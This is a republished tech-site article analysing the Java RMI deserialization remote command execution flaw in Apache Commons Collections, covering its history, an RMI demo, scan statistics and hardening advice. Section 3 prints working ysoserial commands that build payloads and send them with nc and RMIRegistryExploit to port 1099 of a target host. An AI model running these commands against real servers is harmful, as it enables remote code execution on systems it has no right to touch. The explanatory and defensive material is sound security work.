
Analysis of the RMI command execution vulnerability in Java deserialization

2025-04-03 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31 Report

This article analyses the remote command execution vulnerability in Java RMI deserialization. The editor considers it very practical and shares it here; I hope you get something out of it.

1 Overview

As early as 28 January 2015, Gabriel Lawrence and Chris Frohoff showed in a talk at AppSecCali that Java deserialization vulnerabilities could use Apache Commons Collections, a very widely used Java library, to achieve arbitrary code execution, but the finding attracted little attention at the time. Later that year the FoxGlove Security team published a long blog post describing real cases in which Java deserialization, with Apache Commons Collections as the base class library, gave remote command execution. The major Java web servers fell one after another: the vulnerability affected the then-current versions of WebLogic, WebSphere, JBoss, Jenkins and OpenNMS, and for a while the major SRC (security response center) platforms were flooded with reports of it.

In response to this "most underrated vulnerability of 2015", the affected Java application vendors released fixed versions one after another, and the Apache Commons Collections project hardened the affected classes in the library, but a large number of hosts on the Internet are still affected. The subject of this article is the Java RMI deserialization remote command execution vulnerability.

2 What is Java RMI

RMI stands for Remote Method Invocation. It is part of J2SE and lets programmers build distributed applications in Java. An RMI object is a remote Java object whose methods can be called from another Java virtual machine, including across the network. Remote methods are called just like the methods of a local Java object, so objects spread over different JVMs look and behave like local ones. For any RMI interface method that takes an object as a parameter, a caller can send an object it constructed itself, and the server will deserialize it as any serializable class that exists on its classpath.

A Java RMI remote call proceeds as follows:

1. The client object calls the method on the client helper object (the stub).
2. The client helper object packages the call information (arguments, method name) and sends it to the server helper object over the network.
3. The server helper object unpacks the information sent by the client helper object to find the method that is actually being called and the object that the method belongs to.
4. The real method is called on the real service object, and the result is returned to the server helper object.
5. The server helper object packages the result and sends it to the client helper object.
6. The client helper object unpacks the return value and returns it to the client object.
7. The client object receives the return value.

Steps 2 and 5 use Java serialization for the arguments and the return value, and step 3 deserializes them on the server before the real method runs; that is where the attack surface lies.
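The following is an added example, not code from the original article, showing the seven steps above in a minimal RMI service and client in one JVM. The interface name Echo, the service name "echo" and the Greeting class are hypothetical, and the registry is bound to loopback port 1099 only. Its point is that the server deserializes the Object argument, and runs any readObject() logic in the received class, before the remote method body is ever entered.

```java
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;

// Minimal RMI service plus client in one JVM, to show where the
// server-side deserialization (step 3 above) actually happens.
public class RmiDeserializationDemo {

    // Remote interface: every argument and return value crosses the wire
    // as a Java serialization stream. The Object parameter means the
    // server will deserialize whatever serializable class the client sends.
    public interface Echo extends Remote {
        String describe(Object payload) throws RemoteException;
    }

    // The real service object (step 4 above).
    public static class EchoImpl implements Echo {
        @Override
        public String describe(Object payload) {
            // By the time this line runs, the server JVM has already
            // deserialized 'payload', including any readObject() logic in it.
            return "server received " + payload.getClass().getName();
        }
    }

    // Harmless serializable class the client sends (hypothetical, for the
    // demo). Its readObject() prints a line, which shows that code in the
    // deserialized class runs before describe() is invoked. A real attacker
    // does not ship a class of his own: he sends a chain of classes that
    // already exist on the server's classpath, e.g. from Commons Collections.
    public static class Greeting implements Serializable {
        private static final long serialVersionUID = 1L;
        String text = "hello";

        private void readObject(ObjectInputStream in)
                throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            System.out.println("[server] Greeting.readObject() ran during deserialization");
        }
    }

    public static void main(String[] args) throws Exception {
        // Server side: registry and service bound on loopback only; exposing
        // the registry on a public interface is what section 5 warns against.
        System.setProperty("java.rmi.server.hostname", "127.0.0.1");
        Registry registry = LocateRegistry.createRegistry(1099);
        EchoImpl service = new EchoImpl();
        Echo stub = (Echo) UnicastRemoteObject.exportObject(service, 0);
        registry.rebind("echo", stub);   // the registry itself deserializes this stub

        // Client side (normally a different JVM; same process here for brevity).
        Registry client = LocateRegistry.getRegistry("127.0.0.1", 1099);
        Echo remote = (Echo) client.lookup("echo");
        // The "[server] ..." line from readObject() appears before describe()
        // returns its string, i.e. deserialization precedes the method body.
        System.out.println(remote.describe(new Greeting()));

        // Tear down the exported objects so the JVM can exit.
        UnicastRemoteObject.unexportObject(service, true);
        UnicastRemoteObject.unexportObject(registry, true);
    }
}
```

Compile and run with javac RmiDeserializationDemo.java && java RmiDeserializationDemo. Note that the registry's own bind/lookup calls and the distributed garbage collector (DGC) deserialize caller data as well, so even a service whose methods take only String parameters is not free of this attack surface.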

3 What is Java RMI command execution

Port 1099 is the default port of the Java RMI registry, and RMI uses Java serialization for every interaction, so any reachable RMI endpoint deserializes data supplied by the caller. This makes the vulnerability very common: if the port is exposed on the public Internet and the server has a vulnerable version of Apache Commons Collections on its classpath (3.x before 3.2.2, or 4.0), arbitrary commands can be executed on the server. Below, ysoserial is used to demonstrate the vulnerability.

The attack payload is wrapped in a java.lang.reflect.Proxy (the first class named in the dump below, sun.reflect.annotation.AnnotationInvocationHandler, is the invocation handler behind that proxy), and generic types are used when building the proxy so that the same payload works against different applications.

The vulnerability can be used to execute commands on the server, as shown here:

$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000            erride.
0000570: 0078 7071 007e 003a                      .xpq.

$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc xx.xx.xx.xx 1099 < groovypayload.bin

$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

The leading bytes ac ed 00 05 are the Java serialization stream magic and version; seeing them on a socket is a quick sign that an endpoint speaks raw serialization. Note that a standard JDK RMI registry expects the JRMI protocol header (the bytes "JRMI", a version and a protocol byte) before any serialized call and drops connections that do not start with it, so piping a bare payload into port 1099 with nc only works against listeners that feed the socket straight into an ObjectInputStream; RMIRegistryExploit performs the handshake and then delivers the payload as the argument of a registry call.

The vulnerability can likewise be used to read files on the server, for example the contents of the application's datasource configuration files.

Attacks against RMI services can also return command output ("echo") by using the URLClassLoader approach, that is, having the server load a class from a remote URL, instead of running a command blindly as calc.exe does above.

4 Current impact of the Java RMI vulnerability

Although four years have passed since the Java RMI remote command execution vulnerability became public, it is still present on many Internet-facing servers. A preliminary survey of hosts in China with port 1099 open gave the following results:

Statistics over the simple scan results show 12,310 hosts in China with port 1099 open, of which 3,891 (31.6%) actually speak RMI on that port, and 3,114 (25.29% of the hosts with the port open) have the deserialization vulnerability.

5 Hardening recommendations

Do not expose the RMI service port on the public Internet: bind it to an internal interface or firewall it.

Download the SerialKiller temporary patch, put the jar on the classpath, replace java.io.ObjectInputStream in the application code with SerialKiller, and configure it to allow or block specific classes. SerialKiller supports hot reloading, whitelisting and blacklisting, which controls which types are trusted when external input is deserialized. Prefer a whitelist: a blacklist only stops the gadget classes that are known today.

As a temporary workaround, delete InvokerTransformer.class from the Commons Collections jar in the project if the application does not use it, so business functionality is unaffected. The proper fix is to upgrade to Commons Collections 3.2.2 or 4.1, which disable serialization of the dangerous transformer classes by default.

Upgrade middleware such as WebLogic, WebSphere, JBoss and Jenkins regularly.

The above is the analysis of the RMI command execution vulnerability in Java deserialization. The editor believes some of these points will come up in daily work and hopes you have learned something from this article.
